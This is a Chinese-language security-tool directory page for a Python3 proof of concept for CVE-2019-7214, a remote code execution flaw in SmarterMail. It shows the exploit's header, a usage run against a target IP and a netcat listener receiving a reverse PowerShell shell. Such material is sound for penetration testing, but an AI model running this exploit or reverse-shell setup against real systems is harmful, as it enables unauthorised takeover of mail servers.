Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-7214 — # SmarterMail < Build 6985 远程代码执行漏洞(CVE-2019-7214)POC 的 Python3 重写版本,该漏洞由 1F98D 发现 | Kitploit
工具/GitHubGitHub/drew-alleman/cve-2019-7214
Payload生成漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubdrew-alleman/cve-2019-7214

CVE-2019-7214

# SmarterMail < Build 6985 远程代码执行漏洞(CVE-2019-7214)POC 的 Python3 重写版本,该漏洞由 1F98D 发现

查看仓库
411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-7214

root@kitploit:~
# Exploit Title: SmarterMail < Build 6985 Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Modified Author: Drew Alleman
# Date: 10 May 2020
# Vendor Hompage: https://www.smartertools.com/
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
# 
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.

用法

发送利用代码

root@kitploit:~
$ python3 CVE-2019-7214.py -l 192.168.45.215 -r  192.168.111.65
[*] Attacking: tcp://192.168.111.65:17001/Servers
[*] Attempting to send exploit...
[*] Exploit sent! Check your shell at 192.168.45.215:4444

创建监听器

注意:一旦看到 connect to xxx 消息,你需要按回车键才能真正启动 shell。

root@kitploit:~
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.215] from (UNKNOWN) [192.168.111.65] 49788

PS C:\Windows\system32> 
下载工具